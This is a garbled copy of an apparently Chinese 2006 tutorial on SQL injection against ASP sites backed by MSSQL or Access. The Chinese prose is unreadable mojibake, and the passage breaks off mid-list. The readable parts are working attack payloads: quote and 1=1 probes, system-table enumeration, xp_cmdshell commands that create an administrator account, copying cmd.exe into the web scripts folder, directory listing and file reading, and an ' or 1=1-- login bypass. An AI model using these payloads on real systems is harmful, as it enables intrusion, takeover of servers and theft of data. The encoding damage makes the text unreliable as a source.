µçÄÔ°®ºÃÕߣ¬ÌṩIT×ÊѶÐÅÏ¢¼°¸÷Àà±à³Ì֪ʶÎÄÕ½éÉÜ£¬»¶Ó­´ó¼ÒÀ´±¾Õ¾Ñ§Ï°µçÄÔ֪ʶ¡£ ×î½ü¸üР| ÁªÏµÎÒÃÇ RSS¶©Ôı¾Õ¾×îÐÂÎÄÕÂ
µçÄÔ°®ºÃÕß
Õ¾ÄÚËÑË÷£º 
µ±Ç°Î»ÖãºÊ×Ò³>> ÍøÂ簲ȫ>>SQL×¢Èë·¨¹¥»÷Ò»ÈÕͨ:

SQL×¢Èë·¨¹¥»÷Ò»ÈÕͨ

À´Ô´:www.cncfan.com | 2006-2-7 | (ÓÐ2563È˶Á¹ý)


Ëæ×ÅB/SģʽӦÓÿª·¢µÄ·¢Õ¹£¬Ê¹ÓÃÕâÖÖģʽ±àдӦÓóÌÐòµÄ³ÌÐòÔ±Ò²Ô½À´Ô½¶à¡£µ«ÊÇÓÉÓÚ³ÌÐòÔ±µÄˮƽ¼°¾­ÑéÒ²²Î²î²»Æ룬Ï൱´óÒ»²¿·Ö³ÌÐòÔ±ÔÚ±àд´úÂëµÄʱºò£¬Ã»ÓжÔÓû§ÊäÈëÊý¾ÝµÄºÏ·¨ÐÔ½øÐÐÅжϣ¬Ê¹Ó¦ÓóÌÐò´æÔÚ°²È«Òþ»¼¡£Óû§¿ÉÒÔÌá½»Ò»¶ÎÊý¾Ý¿â²éѯ´úÂ룬¸ù¾Ý³ÌÐò·µ»ØµÄ½á¹û£¬»ñµÃijЩËûÏëµÃÖªµÄÊý¾Ý£¬Õâ¾ÍÊÇËùνµÄSQL Injection£¬¼´SQL×¢Èë¡£

SQL×¢ÈëÊÇ´ÓÕý³£µÄWWW¶Ë¿Ú·ÃÎÊ£¬¶øÇÒ±íÃæ¿´ÆðÀ´¸úÒ»°ãµÄWebÒ³Ãæ·ÃÎÊûʲôÇø±ð£¬ËùÒÔÄ¿Ç°ÊÐÃæµÄ·À»ðǽ¶¼²»»á¶ÔSQL×¢Èë·¢³ö¾¯±¨£¬Èç¹û¹ÜÀíԱû²é¿´IISÈÕÖ¾µÄÏ°¹ß£¬¿ÉÄܱ»ÈëÇֺܳ¤Ê±¼ä¶¼²»»á·¢¾õ¡£µ«ÊÇ£¬SQL×¢ÈëµÄÊÖ·¨Ï൱Áé»î£¬ÔÚ×¢ÈëµÄʱºò»áÅöµ½ºÜ¶àÒâÍâµÄÇé¿ö¡£Äܲ»Äܸù¾Ý¾ßÌåÇé¿ö½øÐзÖÎö£¬¹¹ÔìÇÉÃîµÄSQLÓï¾ä£¬´Ó¶ø³É¹¦»ñÈ¡ÏëÒªµÄÊý¾Ý¡£

¾Ýͳ¼Æ£¬ÍøÕ¾ÓÃASP+Access»òSQLServerµÄÕ¼70%ÒÔÉÏ£¬PHP+MySQÕ¼L20%£¬ÆäËûµÄ²»×ã10%¡£ÔÚ±¾ÎÄ£¬ÒÔSQL-SERVER£«ASPÀý˵Ã÷SQL×¢ÈëµÄÔ­Àí¡¢·½·¨Óë¹ý³Ì¡££¨PHP×¢ÈëµÄÎÄÕÂÓÉNBÁªÃ˵ÄÁíһλÅóÓÑzwell׫дµÄÓйØÎÄÕ£©

SQL×¢Èë¹¥»÷µÄ×ÜÌå˼·ÊÇ£º
l ·¢ÏÖSQL×¢ÈëλÖã»
l ÅжϺǫ́Êý¾Ý¿âÀàÐÍ£»
l È·¶¨XP_CMDSHELL¿ÉÖ´ÐÐÇé¿ö
l ·¢ÏÖWEBÐéÄâĿ¼
l ÉÏ´«ASPľÂí£»
l µÃµ½¹ÜÀíԱȨÏÞ£»

Ò»¡¢SQL×¢È멶´µÄÅжÏ

Ò»°ãÀ´Ëµ£¬SQL×¢ÈëÒ»°ã´æÔÚÓÚÐÎÈ磺HTTP://xxx.xxx.xxx/abc.asp?id=XXµÈ´øÓвÎÊýµÄASP¶¯Ì¬ÍøÒ³ÖУ¬ÓÐʱһ¸ö¶¯Ì¬ÍøÒ³ÖпÉÄÜÖ»ÓÐÒ»¸ö²ÎÊý£¬ÓÐʱ¿ÉÄÜÓÐN¸ö²ÎÊý£¬ÓÐʱÊÇÕûÐͲÎÊý£¬ÓÐʱÊÇ×Ö·û´®ÐͲÎÊý£¬²»ÄÜÒ»¸Å¶øÂÛ¡£×ÜÖ®Ö»ÒªÊÇ´øÓвÎÊýµÄ¶¯Ì¬ÍøÒ³ÇÒ´ËÍøÒ³·ÃÎÊÁËÊý¾Ý¿â£¬ÄÇô¾ÍÓпÉÄÜ´æÔÚSQL×¢Èë¡£Èç¹ûASP³ÌÐòԱûÓа²È«Òâʶ£¬²»½øÐбØÒªµÄ×Ö·û¹ýÂË£¬´æÔÚSQL×¢ÈëµÄ¿ÉÄÜÐԾͷdz£´ó¡£

ΪÁËÈ«ÃæÁ˽⶯̬ÍøÒ³»Ø´ðµÄÐÅÏ¢£¬Ê×Ñ¡Çëµ÷ÕûIEµÄÅäÖᣰÑIE²Ëµ¥-¹¤¾ß-InternetÑ¡Ï¸ß¼¶£­ÏÔʾÓѺÃHTTP´íÎóÐÅϢǰÃæµÄ¹´È¥µô¡£
ΪÁË°ÑÎÊÌâ˵Ã÷Çå³þ£¬ÒÔÏÂÒÔHTTP://xxx.xxx.xxx/abc.asp?p=YYΪÀý½øÐзÖÎö£¬YY¿ÉÄÜÊÇÕûÐÍ£¬Ò²ÓпÉÄÜÊÇ×Ö·û´®¡£

1¡¢ÕûÐͲÎÊýµÄÅжÏ
µ±ÊäÈëµÄ²ÎÊýYYΪÕûÐÍʱ£¬Í¨³£abc.aspÖÐSQLÓï¾äԭò´óÖÂÈçÏ£º
select * from ±íÃû where ×Ö¶Î=YY£¬ËùÒÔ¿ÉÒÔÓÃÒÔϲ½Öè²âÊÔSQL×¢ÈëÊÇ·ñ´æÔÚ¡£
¢ÙHTTP://xxx.xxx.xxx/abc.asp?p=YY¡¯(¸½¼ÓÒ»¸öµ¥ÒýºÅ)£¬´Ëʱabc.ASPÖеÄSQLÓï¾ä±ä³ÉÁË
select * from ±íÃû where ×Ö¶Î=YY¡¯£¬abc.aspÔËÐÐÒì³££»
¢ÚHTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.aspÔËÐÐÕý³££¬¶øÇÒÓëHTTP://xxx.xxx.xxx/abc.asp?p=YYÔËÐнá¹ûÏàͬ£»
¢ÛHTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.aspÔËÐÐÒì³££»
Èç¹ûÒÔÉÏÈý²½È«ÃæÂú×㣬abc.aspÖÐÒ»¶¨´æÔÚSQL×¢È멶´¡£

2¡¢×Ö·û´®ÐͲÎÊýµÄÅжÏ
µ±ÊäÈëµÄ²ÎÊýYYΪ×Ö·û´®Ê±£¬Í¨³£abc.aspÖÐSQLÓï¾äԭò´óÖÂÈçÏ£º
select * from ±íÃû where ×Ö¶Î='YY'£¬ËùÒÔ¿ÉÒÔÓÃÒÔϲ½Öè²âÊÔSQL×¢ÈëÊÇ·ñ´æÔÚ¡£
¢ÙHTTP://xxx.xxx.xxx/abc.asp?p=YY¡¯(¸½¼ÓÒ»¸öµ¥ÒýºÅ)£¬´Ëʱabc.ASPÖеÄSQLÓï¾ä±ä³ÉÁË
select * from ±íÃû where ×Ö¶Î=YY¡¯£¬abc.aspÔËÐÐÒì³££»
¢ÚHTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='1', abc.aspÔËÐÐÕý³££¬¶øÇÒÓëHTTP://xxx.xxx.xxx/abc.asp?p=YYÔËÐнá¹ûÏàͬ£»
¢ÛHTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='2', abc.aspÔËÐÐÒì³££»
Èç¹ûÒÔÉÏÈý²½È«ÃæÂú×㣬abc.aspÖÐÒ»¶¨´æÔÚSQL×¢È멶´¡£

3¡¢ÌØÊâÇé¿öµÄ´¦Àí
ÓÐʱASP³ÌÐòÔ±»áÔÚ³ÌÐòÔ±¹ýÂ˵ôµ¥ÒýºÅµÈ×Ö·û£¬ÒÔ·ÀÖ¹SQL×¢Èë¡£´Ëʱ¿ÉÒÔÓÃÒÔϼ¸ÖÖ·½·¨ÊÔÒ»ÊÔ¡£
¢Ù´óС¶¨»ìºÏ·¨£ºÓÉÓÚVBS²¢²»Çø·Ö´óСд£¬¶ø³ÌÐòÔ±ÔÚ¹ýÂËʱͨ³£ÒªÃ´È«²¿¹ýÂË´óд×Ö·û´®£¬ÒªÃ´È«²¿¹ýÂËСд×Ö·û´®£¬¶ø´óСд»ìºÏÍùÍù»á±»ºöÊÓ¡£ÈçÓÃSelecT´úÌæselect,SELECTµÈ£»
¢ÚUNICODE·¨£ºÔÚIISÖУ¬ÒÔUNICODE×Ö·û¼¯ÊµÏÖ¹ú¼Ê»¯£¬ÎÒÃÇÍêÈ«¿ÉÒÔIEÖÐÊäÈëµÄ×Ö·û´®»¯³ÉUNICODE×Ö·û´®½øÐÐÊäÈë¡£Èç+ =%2B£¬¿Õ¸ñ=%20 µÈ£»URLEncodeÐÅÏ¢²Î¼û¸½¼þÒ»£»
¢ÛASCIIÂë·¨£º¿ÉÒÔ°ÑÊäÈëµÄ²¿·Ö»òÈ«²¿×Ö·ûÈ«²¿ÓÃASCIIÂë´úÌ棬ÈçU=chr(85),a=chr(97)µÈ£¬ASCIIÐÅÏ¢²Î¼û¸½¼þ¶þ£»

¶þ¡¢Çø·ÖÊý¾Ý¿â·þÎñÆ÷ÀàÐÍ

Ò»°ãÀ´Ëµ£¬ACCESSÓëSQL£­SERVERÊÇ×î³£ÓõÄÊý¾Ý¿â·þÎñÆ÷£¬¾¡¹ÜËüÃǶ¼Ö§³ÖT£­SQL±ê×¼£¬µ«»¹Óв»Í¬Ö®´¦£¬¶øÇÒ²»Í¬µÄÊý¾Ý¿âÓв»Í¬µÄ¹¥»÷·½·¨£¬±ØÐëÒªÇø±ð¶Ô´ý¡£

1¡¢ ÀûÓÃÊý¾Ý¿â·þÎñÆ÷µÄϵͳ±äÁ¿½øÐÐÇø·Ö
SQL£­SERVERÓÐuser,db_name()µÈϵͳ±äÁ¿£¬ÀûÓÃÕâЩϵͳֵ²»½ö¿ÉÒÔÅжÏSQL-SERVER£¬¶øÇÒ»¹¿ÉÒԵõ½´óÁ¿ÓÐÓÃÐÅÏ¢¡£È磺
¢Ù HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 ²»½ö¿ÉÒÔÅжÏÊÇ·ñÊÇSQL-SERVER£¬¶ø»¹¿ÉÒԵõ½µ±Ç°Á¬½Óµ½Êý¾Ý¿âµÄÓû§Ãû
¢ÚHTTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 ²»½ö¿ÉÒÔÅжÏÊÇ·ñÊÇSQL-SERVER£¬¶ø»¹¿ÉÒԵõ½µ±Ç°ÕýÔÚʹÓõÄÊý¾Ý¿âÃû£»

2¡¢ÀûÓÃϵͳ±í
ACCESSµÄϵͳ±íÊÇmsysobjects,ÇÒÔÚWEB»·¾³ÏÂûÓзÃÎÊȨÏÞ£¬¶øSQL-SERVERµÄϵͳ±íÊÇsysobjects,ÔÚWEB»·¾³ÏÂÓзÃÎÊȨÏÞ¡£¶ÔÓÚÒÔÏÂÁ½ÌõÓï¾ä£º
¢ÙHTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
¢ÚHTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0
ÈôÊý¾Ý¿âÊÇSQL-SERVE£¬ÔòµÚÒ»Ìõ£¬abc.aspÒ»¶¨ÔËÐÐÕý³££¬µÚ¶þÌõÔòÒì³££»ÈôÊÇACCESSÔòÁ½Ìõ¶¼»áÒì³£¡£

3¡¢ MSSQLÈý¸ö¹Ø¼üϵͳ±í
sysdatabasesϵͳ±í£ºMicrosoft SQL Server ÉϵÄÿ¸öÊý¾Ý¿âÔÚ±íÖÐÕ¼Ò»ÐС£×î³õ°²×° SQL Server ʱ£¬sysdatabases °üº¬ master¡¢model¡¢msdb¡¢mssqlweb ºÍ tempdb Êý¾Ý¿âµÄÏî¡£¸Ã±íÖ»´æ´¢ÔÚ master Êý¾Ý¿âÖС£ Õâ¸ö±í±£´æÔÚmasterÊý¾Ý¿âÖУ¬Õâ¸ö±íÖб£´æµÄÊÇʲôÐÅÏ¢ÄØ£¿Õâ¸ö·Ç³£ÖØÒª¡£ËûÊÇ ±£´æÁËËùÓеĿâÃû,ÒÔ¼°¿âµÄIDºÍһЩÏà¹ØÐÅÏ¢¡£
ÕâÀïÎҰѶÔÓÚÎÒÃÇÓÐÓõÄ×Ö¶ÎÃû³ÆºÍÏà¹Ø˵Ã÷¸ø´ó¼ÒÁгöÀ´¡£name //±íʾ¿âµÄÃû×Ö¡£
dbid //±íʾ¿âµÄID£¬dbid´Ó1µ½5ÊÇϵͳµÄ¡£·Ö±ðÊÇ£ºmaster¡¢model¡¢msdb¡¢mssqlweb¡¢tempdb ÕâÎå¸ö¿â¡£ÓÃselect * from master.dbo.sysdatabases ¾Í¿ÉÒÔ²éѯ³öËùÓеĿâÃû¡£
Sysobjects£ºSQL-SERVERµÄÿ¸öÊý¾Ý¿âÄÚ¶¼ÓдËϵͳ±í£¬Ëü´æ·Å¸ÃÊý¾Ý¿âÄÚ´´½¨µÄËùÓжÔÏó£¬ÈçÔ¼Êø¡¢Ä¬ÈÏÖµ¡¢ÈÕÖ¾¡¢¹æÔò¡¢´æ´¢¹ý³ÌµÈ£¬Ã¿¸ö¶ÔÏóÔÚ±íÖÐÕ¼Ò»ÐС£ÒÔÏÂÊÇ´Ëϵͳ±íµÄ×Ö¶ÎÃû³ÆºÍÏà¹Ø˵Ã÷¡£
Name£¬id£¬xtype£¬uid£¬status£º·Ö±ðÊǶÔÏóÃû£¬¶ÔÏóID£¬¶ÔÏóÀàÐÍ£¬ËùÓÐÕ߶ÔÏóµÄÓû§ID,¶ÔÏó״̬¡£
¶ÔÏóÀàÐÍ(xtype)¡£¿ÉÒÔÊÇÏÂÁжÔÏóÀàÐÍÖеÄÒ»ÖÖ£º
C = CHECK Ô¼Êø
D = ĬÈÏÖµ»ò DEFAULT Ô¼Êø
F = FOREIGN KEY Ô¼Êø
L = ÈÕÖ¾
FN = ±êÁ¿º¯Êý
IF = ÄÚǶ±íº¯Êý
P = ´æ´¢¹ý³Ì
PK = PRIMARY KEY Ô¼Êø£¨ÀàÐÍÊÇ K£©
RF = ¸´ÖÆɸѡ´æ´¢¹ý³Ì
S = ϵͳ±í
TF = ±íº¯Êý
TR = ´¥·¢Æ÷
U = Óû§±í
UQ = UNIQUE Ô¼Êø£¨ÀàÐÍÊÇ K£©
V = ÊÓͼ
X = À©Õ¹´æ´¢¹ý³Ì
µ±xtype='U' and status>0´ú±íÊÇÓû§½¨Á¢µÄ±í£¬¶ÔÏóÃû¾ÍÊDZíÃû£¬¶ÔÏóID¾ÍÊDZíµÄIDÖµ¡£
ÓÃ: select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 ¾Í¿ÉÒÔÁгö¿âChouYFDÖÐËùÓеÄÓû§½¨Á¢µÄ±íÃû¡£
syscolumns £ºÃ¿¸ö±íºÍÊÓͼÖеÄÿÁÐÔÚ±íÖÐÕ¼Ò»ÐУ¬´æ´¢¹ý³ÌÖеÄÿ¸ö²ÎÊýÔÚ±íÖÐÒ²Õ¼Ò»ÐС£¸Ã±íλÓÚÿ¸öÊý¾Ý¿âÖС£Ö÷Òª×Ö¶ÎÓУº
name £¬id£¬ colid £º·Ö±ðÊÇ×Ö¶ÎÃû³Æ£¬±íIDºÅ£¬×Ö¶ÎIDºÅ£¬ÆäÖÐµÄ ID ÊÇ ¸ÕÉÏÎÒÃÇÓÃsysobjectsµÃµ½µÄ±íµÄIDºÅ¡£
ÓÃ: select * from ChouYFD.dbo.syscolumns where id=123456789 µÃµ½ChouYFDÕâ¸ö¿âÖУ¬±íµÄIDÊÇ123456789ÖеÄËùÓÐ×Ö¶ÎÁÐ±í¡£

Èý¡¢È·¶¨XP_CMDSHELL¿ÉÖ´ÐÐÇé¿ö

Èôµ±Ç°Á¬½ÓÊý¾ÝµÄÕʺžßÓÐSAȨÏÞ£¬ÇÒmaster.dbo.xp_cmdshellÀ©Õ¹´æ´¢¹ý³Ì(µ÷Óô˴洢¹ý³Ì¿ÉÒÔÖ±½ÓʹÓòÙ×÷ϵͳµÄshell)Äܹ»ÕýÈ·Ö´ÐУ¬ÔòÕû¸ö¼ÆËã»ú¿ÉÒÔͨ¹ýÒÔϼ¸ÖÖ·½·¨ÍêÈ«¿ØÖÆ£¬ÒÔºóµÄËùÓв½Ö趼¿ÉÒÔÊ¡
1¡¢HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.aspÖ´ÐÐÒì³£µ«¿ÉÒԵõ½µ±Ç°Á¬½ÓÊý¾Ý¿âµÄÓû§Ãû(ÈôÏÔʾdboÔò´ú±íSA)¡£
2¡¢HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.aspÖ´ÐÐÒì³£µ«¿ÉÒԵõ½µ±Ç°Á¬½ÓµÄÊý¾Ý¿âÃû¡£
3¡¢HTTP://xxx.xxx.xxx/abc.asp?p=YY£»exec master..xp_cmdshell ¡°net user aaa bbb /add¡±-- (masterÊÇSQL-SERVERµÄÖ÷Êý¾Ý¿â£»ÃûÖеķֺűíʾSQL-SERVERÖ´ÐÐÍê·ÖºÅÇ°µÄÓï¾äÃû£¬¼ÌÐøÖ´ÐÐÆäºóÃæµÄÓï¾ä£»¡°¡ª¡±ºÅÊÇ×¢½â£¬±íʾÆäºóÃæµÄËùÓÐÄÚÈݽöΪעÊÍ£¬ÏµÍ³²¢²»Ö´ÐÐ)¿ÉÒÔÖ±½ÓÔö¼Ó²Ù×÷ϵͳÕÊ»§aaa,ÃÜÂëΪbbb¡£
4¡¢HTTP://xxx.xxx.xxx/abc.asp?p=YY£»exec master..xp_cmdshell ¡°net localgroup administrators aaa /add¡±-- °Ñ¸Õ¸ÕÔö¼ÓµÄÕÊ»§aaa¼Óµ½administrators×éÖС£
5¡¢HTTP://xxx.xxx.xxx/abc.asp?p=YY£»backuup database Êý¾Ý¿âÃû to disk='c:\inetpub\wwwroot\save.db' Ôò°ÑµÃµ½µÄÊý¾ÝÄÚÈÝÈ«²¿±¸·Ýµ½WEBĿ¼Ï£¬ÔÙÓÃHTTP°Ñ´ËÎļþÏÂÔØ(µ±È»Ê×Ñ¡ÒªÖªµÀWEBÐéÄâĿ¼)¡£
6¡¢Í¨¹ý¸´ÖÆCMD´´½¨UNICODE©¶´
HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell ¡°copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe¡± ±ãÖÆÔìÁËÒ»¸öUNICODE©¶´£¬Í¨¹ý´Ë©¶´µÄÀûÓ÷½·¨£¬±ãÍê³ÉÁ˶ÔÕû¸ö¼ÆËã»úµÄ¿ØÖÆ(µ±È»Ê×Ñ¡ÒªÖªµÀWEBÐéÄâĿ¼)¡£

ËÄ¡¢·¢ÏÖWEBÐéÄâĿ¼

Ö»ÓÐÕÒµ½WEBÐéÄâĿ¼£¬²ÅÄÜÈ·¶¨·ÅÖÃASPľÂíµÄλÖ㬽ø¶øµÃµ½USERȨÏÞ¡£ÓÐÁ½ÖÖ·½·¨±È½ÏÓÐЧ¡£

Ò»ÊǸù¾Ý¾­Ñé²Â½â£¬Ò»°ãÀ´Ëµ£¬WEBÐéÄâĿ¼ÊÇ£ºc:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwrootµÈ£¬¶ø¿ÉÖ´ÐÐÐéÄâĿ¼ÊÇ£ºc:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scriptsµÈ¡£

¶þÊDZéÀúϵͳµÄĿ¼½á¹¹£¬·ÖÎö½á¹û²¢·¢ÏÖWEBÐéÄâĿ¼£»
ÏÈ´´½¨Ò»¸öÁÙʱ±í£ºtemp
HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
½ÓÏÂÀ´£º
£¨1£©ÎÒÃÇ¿ÉÒÔÀûÓÃxp_availablemediaÀ´»ñµÃµ±Ç°ËùÓÐÇý¶¯Æ÷,²¢´æÈëtemp±íÖУº
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
ÎÒÃÇ¿ÉÒÔͨ¹ý²éѯtempµÄÄÚÈÝÀ´»ñµÃÇý¶¯Æ÷ÁÐ±í¼°Ïà¹ØÐÅÏ¢
£¨2£©ÎÒÃÇ¿ÉÒÔÀûÓÃxp_subdirs»ñµÃ×ÓĿ¼Áбí,²¢´æÈëtemp±íÖУº
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs 'c:\';--
£¨3£©ÎÒÃÇ»¹¿ÉÒÔÀûÓÃxp_dirtree»ñµÃËùÓÐ×ÓĿ¼µÄĿ¼Ê÷½á¹¹,²¢´çÈëtemp±íÖУº
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
ÕâÑù¾Í¿ÉÒԳɹ¦µÄä¯ÀÀµ½ËùÓеÄĿ¼£¨Îļþ¼Ð£©ÁÐ±í£º
Èç¹ûÎÒÃÇÐèÒª²é¿´Ä³¸öÎļþµÄÄÚÈÝ£¬¿ÉÒÔͨ¹ýÖ´ÐÐxp_cmdsell£º
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec ... nbsp;'type c:\web\index.asp';--
ʹÓÃ'bulk insert'Óï·¨¿ÉÒÔ½«Ò»¸öÎı¾Îļþ²åÈëµ½Ò»¸öÁÙʱ±íÖС£È磺bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
ä¯ÀÀtemp¾Í¿ÉÒÔ¿´µ½index.aspÎļþµÄÄÚÈÝÁË£¡Í¨¹ý·ÖÎö¸÷ÖÖASPÎļþ£¬¿ÉÒԵõ½´óÁ¿ÏµÍ³ÐÅÏ¢£¬WEB½¨ÉèÓë¹ÜÀíÐÅÏ¢£¬ÉõÖÁ¿ÉÒԵõ½SAÕʺŵÄÁ¬½ÓÃÜÂë¡£
µ±È»£¬Èç¹ûxp_cmshellÄܹ»Ö´ÐУ¬ÎÒÃÇ¿ÉÒÔÓÃËüÀ´Íê³É£º
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&nbs ... cmdshell 'dir c:\';--
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&n ... p_cmdshell 'dir c:\ *.asp /s/a';--
ͨ¹ýxp_cmdshellÎÒÃÇ¿ÉÒÔ¿´µ½ËùÓÐÏë¿´µ½µÄ£¬°üÀ¨W3svc
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshe ... ub\AdminScripts\adsutil.vbs enum w3svc'
µ«ÊÇ£¬Èç¹û²»ÊÇSAȨÏÞ£¬ÎÒÃÇ»¹¿ÉÒÔʹÓÃ
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

×¢Ò⣺
1¡¢ÒÔÉÏÿÍê³ÉÒ»Ïîä¯ÀÀºó£¬Ó¦É¾³ýTEMPÖеÄËùÓÐÄÚÈÝ£¬É¾³ý·½·¨ÊÇ£º
HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--
2¡¢ä¯ÀÀTEMP±íµÄ·½·¨ÊÇ£º(¼ÙÉèTestDBÊǵ±Ç°Á¬½ÓµÄÊý¾Ý¿âÃû)
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 µÃµ½±íTEMPÖеÚÒ»Ìõ¼Ç¼id×ֶεÄÖµ£¬²¢ÓëÕûÊý½øÐбȽϣ¬ÏÔÈ»abc.asp¹¤×÷Òì³££¬µ«ÔÚÒì³£ÖÐÈ´¿ÉÒÔ·¢ÏÖid×ֶεÄÖµ¡£¼ÙÉè·¢ÏֵıíÃûÊÇxyz£¬Ôò
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in('xyz'))>0 µÃµ½±íTEMPÖеڶþÌõ¼Ç¼id×ֶεÄÖµ¡£

Îå¡¢ÉÏ´«ASPľÂí

ËùνASPľÂí£¬¾ÍÊÇÒ»¶ÎÓÐÌØÊ⹦ÄܵÄASP´úÂ룬²¢·ÅÈëWEBÐéÄâĿ¼µÄScriptsÏ£¬Ô¶³Ì¿Í»§Í¨¹ýIE¾Í¿ÉÖ´ÐÐËü£¬½ø¶øµÃµ½ÏµÍ³µÄUSERȨÏÞ£¬ÊµÏÖ¶ÔϵͳµÄ³õ²½¿ØÖÆ¡£ÉÏ´«ASPľÂíÒ»°ãÓÐÁ½ÖֱȽÏÓÐЧµÄ·½·¨£º

1¡¢ÀûÓÃWEBµÄÔ¶³Ì¹ÜÀí¹¦ÄÜ
Ðí¶àWEBÕ¾µã£¬ÎªÁËά»¤µÄ·½±ã£¬¶¼ÌṩÁËÔ¶³Ì¹ÜÀíµÄ¹¦ÄÜ£»Ò²Óв»ÉÙWEBÕ¾µã£¬ÆäÄÚÈÝÊǶÔÓÚ²»Í¬µÄÓû§Óв»Í¬µÄ·ÃÎÊȨÏÞ¡£ÎªÁË´ïµ½¶ÔÓû§È¨Ï޵ĿØÖÆ£¬¶¼ÓÐÒ»¸öÍøÒ³£¬ÒªÇóÓû§ÃûÓëÃÜÂ룬ֻÓÐÊäÈëÁËÕýÈ·µÄÖµ£¬²ÅÄܽøÐÐÏÂÒ»²½µÄ²Ù×÷,¿ÉÒÔʵÏÖ¶ÔWEBµÄ¹ÜÀí£¬ÈçÉÏ´«¡¢ÏÂÔØÎļþ£¬Ä¿Â¼ä¯ÀÀ¡¢ÐÞ¸ÄÅäÖõȡ£
Òò´Ë£¬Èô»ñÈ¡ÕýÈ·µÄÓû§ÃûÓëÃÜÂ룬²»½ö¿ÉÒÔÉÏ´«ASPľÂí£¬ÓÐʱÉõÖÁÄܹ»Ö±½ÓµÃµ½USERȨÏÞ¶øä¯ÀÀϵͳ£¬ÉÏÒ»²½µÄ¡°·¢ÏÖWEBÐéÄâĿ¼¡±µÄ¸´ÔÓ²Ù×÷¶¼¿ÉÊ¡ÂÔ¡£
Óû§Ãû¼°ÃÜÂëÒ»°ã´æ·ÅÔÚÒ»ÕűíÖУ¬·¢ÏÖÕâÕÅ±í²¢¶ÁÈ¡ÆäÖÐÄÚÈݱã½â¾öÁËÎÊÌâ¡£ÒÔϸø³öÁ½ÖÖÓÐЧ·½·¨¡£
A¡¢ ×¢Èë·¨£º
´ÓÀíÂÛÉÏ˵£¬ÈÏÖ¤ÍøÒ³ÖлáÓÐÐÍÈ磺
select * from admin where username='XXX' and password='YYY' µÄÓï¾ä£¬ÈôÔÚÕýʽÔËÐд˾ä֮ǰ£¬Ã»ÓнøÐбØÒªµÄ×Ö·û¹ýÂË£¬ÔòºÜÈÝÒ×ʵʩSQL×¢Èë¡£
ÈçÔÚÓû§ÃûÎı¾¿òÄÚÊäÈ룺abc¡¯ or 1=1-- ÔÚÃÜÂë¿òÄÚÊäÈ룺123 ÔòSQLÓï¾ä±ä³É£º
select * from admin where username='abc¡¯ or 1=1 and password='123¡¯ ²»¹ÜÓû§ÊäÈëÈκÎÓû§ÃûÓëÃÜÂ룬´ËÓï¾äÓÀÔ¶¶¼ÄÜÕýÈ·Ö´ÐУ¬Óû§ÇáÒ×Æ­¹ýϵͳ£¬»ñÈ¡ºÏ·¨Éí·Ý¡£
B¡¢²Â½â·¨£º
»ù±¾Ë¼Â·ÊÇ£º²Â½âËùÓÐÊý¾Ý¿âÃû³Æ£¬²Â³ö¿âÖеÄÿÕűíÃû£¬·ÖÎö¿ÉÄÜÊÇ´æ·ÅÓû§ÃûÓëÃÜÂëµÄ±íÃû£¬²Â³ö±íÖеÄÿ¸ö×Ö¶ÎÃû£¬²Â³ö±íÖеÄÿÌõ¼Ç¼ÄÚÈÝ¡£
l ²Â½âËùÓÐÊý¾Ý¿âÃû³Æ
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 ÒòΪ dbid µÄÖµ´Ó1µ½5£¬ÊÇϵͳÓÃÁË¡£ËùÒÔÓû§×Ô¼º½¨µÄÒ»¶¨ÊÇ´Ó6¿ªÊ¼µÄ¡£²¢ÇÒÎÒÃÇÌá½»ÁË name>1 (name×Ö¶ÎÊÇÒ»¸ö×Ö·ûÐ͵Ä×ֶκÍÊý×ֱȽϻá³ö´í),abc.asp¹¤×÷Òì³££¬¿ÉµÃµ½µÚÒ»¸öÊý¾Ý¿âÃû£¬Í¬Àí°ÑDBID·Ö±ð¸Ä³É7,8£¬9,10,11,12¡­¾Í¿ÉµÃµ½ËùÓÐÊý¾Ý¿âÃû¡£
ÒÔϼÙÉèµÃµ½µÄÊý¾Ý¿âÃûÊÇTestDB¡£
l ²Â½âÊý¾Ý¿âÖÐÓû§Ãû±íµÄÃû³Æ
²Â½â·¨£º´Ë·½·¨¾ÍÊǸù¾Ý¸öÈ˵ľ­Ñé²Â±íÃû£¬Ò»°ãÀ´Ëµ£¬user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
